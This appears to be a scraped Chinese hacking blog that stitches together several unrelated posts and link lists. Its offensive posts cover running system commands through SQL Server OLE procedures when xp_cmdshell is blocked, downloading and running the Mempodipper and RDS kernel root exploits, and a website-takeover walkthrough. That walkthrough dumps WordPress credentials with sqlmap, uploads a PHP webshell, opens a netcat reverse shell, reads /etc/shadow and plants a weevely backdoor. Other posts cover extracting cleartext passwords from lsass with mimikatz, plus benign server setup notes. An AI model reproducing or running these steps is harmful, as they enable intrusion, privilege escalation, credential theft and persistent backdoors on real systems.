EXEC master.dbo.xp_cmdshell 'dir c:\'

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险，他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名，这时侯许多人也许会放弃，因为我们无法运行任何的cmd命令，很难查看对方计算机的文件、目录、开启的服务，也无法添加NT用户。

对此作过一番研究，后来我发现即使xp_cmdshell不可用了，还是有可能在服务器上运行CMD并得到回显结果的，这里要用到SQL服务器另外的几个系统存储过程：sp_OACreate，sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。

sp_OACreate
在 Microsoft? SQL Server? 实例上创建 OLE 对象实例。
语法
sp_OACreate progid, | clsid,
objecttoken OUTPUT
[ , context ]
sp_OAGetProperty
获取 OLE 对象的属性值。
语法
sp_OAGetProperty objecttoken,
propertyname
[, propertyvalue OUTPUT]
[, index...]
sp_OAMethod
调用 OLE 对象的方法。
语法
sp_OAMethod objecttoken,
methodname
[, returnvalue OUTPUT]
[ , [ @parametername = ] parameter [ OUTPUT ]
[...n]]

思路：
先在SQL Server 上建立一个Wscript.Shell，调用其run Method，将cmd.exe执行的结果输出到一个文件中，然后再建立一个Scripting.FileSystemObject，通过它建立一个TextStream对象，读出临时文件中的字符，一行一行的添加到一个临时表中。

以下是相应的SQL语句

CREATE TABLE mytmp(info VARCHAR(400),ID IDENTITY (1, 1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。

EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌

WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

注意：
如果你在进行注入测试时使用这种方法就不能有这样多的换行，必须把它们合为一行，每个语句中间用空格符隔开。

相关文章

• 2008年10月9日 -- 恢复xp_cmdshell的N个方法
• 2012年01月31日 -- 命令行导出IIS配置信息
• 2011年11月24日 -- 域内指定用户中马
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2010年05月5日 -- 搞内网的一个小技巧
• 2010年04月22日 -- 更改windows2003最大连接数
• 2010年03月1日 -- 让千千静听不再弹出广告
• 2010年01月19日 -- 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
• 2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法

解决办法：

cd /opt/metasploit/common/lib

mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b

mv libssl.so.0.9.8 libssl.so.0.9.8-backup

ln -s /usr/lib/libcrypto.so.0.9.8

ln -s /usr/lib/libssl.so.0.9.8

msfupdate

相关文章

• 2012年03月6日 -- BackTrack 5 从R1 升级到 BackTrack 5 R2
• 2012年03月6日 -- 来看看老外的日站思路
• 2012年02月17日 -- BT5 R1 启动自动进入图形界面
• 2012年02月17日 -- BT5 R1 下VPN拨号 安装networkmanager
• 2011年11月22日 -- BT5 R1 Install VMware Tools
• 2011年06月13日 -- Dumping Hashes on Win2008 R2 x64 with Metasploit
• 2011年06月8日 -- Backtrack5 汉化
• 2008年11月20日 -- Metasploit Framework 3.2 Released 最新版

BackBox是基于Ubuntu的发行，它被开发用于网络渗透测试及安全评估。它被设计为快捷且易于使用。它提供了一份最低纲领的但完整的桌面环境，而这得益于它自己的软件仓库，该仓库总是同步到最新版本的、最常用且以合乎道德而闻名的黑客工具。

Pro-actively protect your IT infrastructure with BackBox. It is the perfect security solution; providing pen-testing, incident response, computer forensics, and intelligence gathering tools. The most current release of BackBox Linux includes the latest software solutions for vulnerability analysis/assessment and pen-testing. It is one of the lightest/fastest Linux distros available on the Internet.

它的基础设施,及时保护你BackBox。它具有完善的安全解决方案,提供pen-testing,事件反应,计算机取证和收集情报的工具。最新释放BackBox Linux包括最新的软件解决方案和pen-testing脆弱性分析/评估。这是一个最distros Linux /最快可以在因特网上获得。

下载：http://www.backbox.org/downloads

相关文章

• 2012年03月6日 -- Linux 2.6.39 到 3.2.0 爆提权漏洞
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2.编译

gcc mempodipper.c -o mempodipper

3.执行前察看

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 n l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4.执行
netcat@netcat:~$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8049564.
[+] Executing su with shellcode.
sh-4.2#

相关文章

• 2012年03月6日 -- BackBox Linux 2.01
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令

1. Update and upgrade your BT5 (R1) installation:

Once that’s done, you should already have the new kernel installed as well as any last updates we have for the official R2 release. You need to reboot to have the 3.2.6 kernel kick in.

2. OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

On the next reboot, you should see the red console splash screen appear.

3. Verify that you are running a 3.2.6 kernel:

You should see something like “Linux bt 3.2.6 …”

4. Feel free to install any or all of the new tools featured in BackTrack 5 R2:

5. Add the new security updates repository to /etc/apt/sources.list, and run another upgrade.

During the last upgrade you’ll be asked about file revision updates. Make sure to always keep the locally installed file. Feel free to press “Enter” and accept all the defaults.

6. Some of the newly installed services will be set to start on boot. We like disabling these as needed:

And…you’re done! Expect a more comprehensive introduction to BT5 R2, on the day of the Official release – March 1st! The BackTrack 5 R2 ISOS will we available for download from our site on March 1st via Torrent only. HTTP links will be added a few days later.

相关文章

• 2012年03月8日 -- 解决BackTrack 5 R2 Metasploit Bug
• 2012年03月6日 -- 来看看老外的日站思路
• 2012年02月17日 -- BT5 R1 启动自动进入图形界面
• 2012年02月17日 -- BT5 R1 下VPN拨号 安装networkmanager
• 2011年11月22日 -- BT5 R1 Install VMware Tools
• 2011年06月8日 -- Backtrack5 汉化

问题的答案看起来不那么确定，显而易见的是黑掉一个站点有很多种方法。在这篇文章，我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的！

让我们来看看目标站点：hack-test.com

先ping下站点所在服务器的IP：

现在我们有了目标站点所在服务器的IP了 — 173.236.138.113

然后我们可以找找同个IP上的其他站点（旁站：sameip.org）：

Same IP   26 sites hosted on IP Address 173.236.138.113

总计有26个站点在[173.236.138.113]这台服务器上。为了黑掉目标站点，许多黑客会把目标站点同服的其他站点也划入攻击范围内。但是出于学习的目的，我们今天暂且将其他站点放在一边。

我们需要更多关于目标站点的信息（Ps：笔者认为在渗透测试过程中，这比实施测试的环节来得重要得多。），他们包括：

1.DNS记录（A，NS，TXT，MX）

2.WEB服务类型（IIS，APACHE，TOMCAT）

3.域名注册者的信息（所持有域名公司等）

4.目标站点管理员（相关人员）的姓名，电话，邮箱和住址等

5.目标站点所支持的脚本类型（PHP，ASP，JSP，ASP.net，CFM）

6.目标站点的操作系统（UNIX,LINUX,WINDOWS,SOLARIS）

7.目标站点开放的端口

让我们先来查询相关DNS记录吧，这里用的是 who.is：

目标站点DNS记录信息：

同时确认WEB服务的类型：

显而易见是Apache ,稍后我们将确定其版本：

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113

Website Status: active

Server Type: Apache

Alexa Trend/Rank:  1 Month: 3,213,968    3 Month: 2,161,753 Page Views per Visit:  1 Month: 2.0    3 Month: 3.7

现在是时候来查询目标站点持有人（也许可能就是管理员）信息了：

现在我们有了管理员的一些相关信息了，祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息：

Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.

现在我们知道，目标站点使用了用PHP编写的非常出名的开源博客系统WordPress，并且是跑在Fedora的Linux发行版上的，Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口：

祭出神器Nmap

1 – 获取目标服务器开放的服务

root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2 – 获取目标服务器操作系统

root@bt:/# nmap -O hack-test.com 

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh 

80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop 

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

啊哦！~只开了80，而且是 Fedora Core 6 Linux内核版本为2.6.22

现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。（Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.）

让我们先试试 Nakto.pl 来扫扫，没准能搞出点漏洞来

root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————

同时试试Wa3f（Ps：哦哇谱死的开源项目，很不错的说~）

root@bt:/pentest/web/w3af# ./w3af_gui 

Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0 

w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.

图形界面的扫描方式，写入URL即可。

用以前给杂志社投稿的语气说，泡杯茶的功夫，等待扫描结束并查看结果。

你可以看到很多漏洞信息鸟~先试试SQL注入。

url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!

发现其他漏洞测试失败，用SQLMap进行脱裤吧（猜解数据库并保存目标站点相关信息到本地）  Dump it!

sqlmap -u url

过一小会儿能见到如下信息

按n并回车后你可以看到

哦也~显错方式的注入点，而且爆出的 Mysql的版本信息

用sqlmap取得所有库，参数 -dbs

找到三个库

查Wordpress的库中所有表，参数 -D wordpress -tables

然后是列名（这里需要你自己熟悉敏感信息存在哪个表中呢），参数 -T wp_users -columns

22个字段（列）

然后查数据，参数 -C user_login,user_pass –dump

然后解密管理员的hash，这里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php

明文密码是q1w2e3（和csdn库的密码排行榜有得一拼，哈哈~），然后登入后台拿webshell了。

Get in!~

来传个PHP的webshell吧~这里用的编辑插件拿shell的方法（见我以前写的tips，方法有很多哦~）

牛b。保存就可以了。然后访问就可以看到可爱的webshell了。

灰阔都知道，接下来要提权了。用反弹来获取一个交互式的shell。

本地用nc监听（不得不说经典就是经典啊~）

连上之后

输点Linux命令试试火候

id uid=48(apache) gid=489(apache) groups=489(apache)

pwd /var/www/html/Hackademic_RTB1/wp-content/plugins

uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

命令作用我就不翻译了。获取了内核版本，我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。

老外都是用wget下载的，国内灰阔们呢?

wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c' 

0K ...... 100% 29.7K=0.2s

代码我不贴了。用gcc编译exp gcc roro.c -o roro ，编译并且执行exp。

./roro 

[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

淡定，敲个id试试，你可以发现 root it!

现在可以查看shadow和passwd了~（我只截了部分）

cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::

我们可以使用 John the ripper 来破哈希。但是我们不会这么做，通常我们会留下一个后门（权限巩固），这样就可以随时涂掉他首页了（hv a joke.）。

我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。

1 – weevely的相关选项

root@bt:/pentest/backdoors/web/weevely# ./main.py - 

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 

Usage: main.py [options] 

Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, --terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form 'label,url,password' where label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor . 

-u URL, --url=URL Remote backdoor URL .

2 – 用它来创建一个PHP的webshell

 root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko 

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 

+ Backdoor file 'hax.php' created with password 'koko'.

3 – 上传

我们现在可以用weevely连接并操控他了。

测试（其实就相当于一句话马差不多的..）

总结：

老外的行文方式还不错，很好的渗透流程，很标准的科普文~~

相关文章

• 2012年03月8日 -- 解决BackTrack 5 R2 Metasploit Bug
• 2012年03月6日 -- BackTrack 5 从R1 升级到 BackTrack 5 R2
• 2012年02月17日 -- BT5 R1 启动自动进入图形界面
• 2012年02月17日 -- BT5 R1 下VPN拨号 安装networkmanager
• 2011年11月22日 -- BT5 R1 Install VMware Tools
• 2011年06月8日 -- Backtrack5 汉化

http://blog.gentilkiwi.com/mimikatz

还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

自己尝试了下用 win2008 r2 x64 来测试

最后测试成功 wdigest 就是我的明文密码

我还测过密码复杂度在14位以上

包含数字 大小写字母 特殊字符的密码

一样能抓出明文密码来

以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash

但用了这个神器抓出明文密码后

由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已

应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)

这样这个加密算法是可逆的 能被解密出明文

所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法

逆向功底比较好的童鞋可以尝试去逆向分析一下

然后这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器

可以提升进程权限 注入进程 读取进程内存等等

下面展示一个 读取扫雷游戏的内存的例子

我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了

总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

随机日志

• 2009年03月4日 -- 彩虹QQ – 再见
• 2008年11月27日 -- 攻击CISCO路由器的详细步骤
• 2009年11月23日 -- MySQL安装详细图解
• 2010年05月31日 -- Nginx 0.8.35 Space Character Remote Source Disclosure
• 2008年11月20日 -- Slax 6.07 官方迅雷高速下载
• 2007年05月21日 -- 2007年最佳的七十五个网络分析和安全工具
• 2008年10月24日 -- 批处理中Dos符号作用大全（二）
• 2011年06月20日 -- Update Script for Backtrack 5
• 2006年10月22日 -- 动易SP4的漏洞利用
• 2009年10月15日 -- Linux网络安全经验之谈

[1].安装 Nginx

1,添加一个不能登录且没有主目录的用户：

2,必要的组件

3,编译nginx并安装

[2].安装 PHP

1,安装必要的组件

==64位系统==

==64位系统==

2,编译php并安装

3,拷贝和修改php配置文件

修改php.ini

修改php-fpm.conf

4,添加服务启动脚本

[3].安装 Mysql

3.1, 创建mysql安装目录

3.2, 创建数据存放目录

3.3, 创建用户和用户组与赋予数据存放目录权限

3.4, 安装必要的组件

3.5, 编译安装Mysql

3.6, 初始化数据库

3.7, 配置环境

3.8, 启动并设置初始密码

进行再修改密码的语句
1: UPDATE mysql.user SET Password = PASSWORD(‘newpwd’) WHERE User = ‘root’;(生新设置密码)
2: flush privileges;（刷新权限）

相关文章

• 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
• 2011年12月3日 -- PHP端口复用的利用
• 2011年12月3日 -- php open_basedir设置以及关于安全
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月4日 -- 也谈Nginx的CGI PATH INFO问题
• 2011年06月4日 -- Nginx https 免费SSL证书配置指南
• 2011年06月3日 -- nginx下wp super cache 设置
• 2011年06月2日 -- Mysql安全
• 2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP

1,安装rungetty

2,编辑 /etc/init/tty1.conf

将exec这一段注释掉并加一句

3,编辑.bash_profile文件，如果没有则建立它

第二种：直接启动到图形界面，提示输入用户密码

1,安装gdm

2,设置默认为gdm

3.编辑grub

GRUB_CMDLINE_LINUX_DEFAULT=”text splash vga=791″
修改成quiet
GRUB_CMDLINE_LINUX_DEFAULT=”quiet splash vga=791″

4.更新grub

5.重启

相关文章

• 2012年02月17日 -- BT5 R1 下VPN拨号 安装networkmanager
• 2011年11月22日 -- BT5 R1 Install VMware Tools
• 2011年06月8日 -- Backtrack5 汉化
• 2012年03月8日 -- 解决BackTrack 5 R2 Metasploit Bug
• 2012年03月6日 -- BackTrack 5 从R1 升级到 BackTrack 5 R2
• 2012年03月6日 -- 来看看老外的日站思路
• 2011年06月20日 -- Update Script for Backtrack 5
• 2011年06月8日 -- BackTrack5 下破解无线
• 2011年06月6日 -- BT5下用ncrack破解3389

安装并重启network-manager后，Gnone菜单右上角出现网络的图标，点击添加VPN即可

2, Wicd Network Manager 无线连接界面出错:
Could not connect to wicd’s D-Bus interface.Check the wicd log for error messages.
解决办法：

相关文章

• 2012年02月17日 -- BT5 R1 启动自动进入图形界面
• 2011年11月22日 -- BT5 R1 Install VMware Tools
• 2011年06月8日 -- Backtrack5 汉化
• 2012年03月8日 -- 解决BackTrack 5 R2 Metasploit Bug
• 2012年03月6日 -- BackTrack 5 从R1 升级到 BackTrack 5 R2
• 2012年03月6日 -- 来看看老外的日站思路
• 2011年06月20日 -- Update Script for Backtrack 5
• 2011年06月8日 -- BackTrack5 下破解无线
• 2011年06月6日 -- BT5下用ncrack破解3389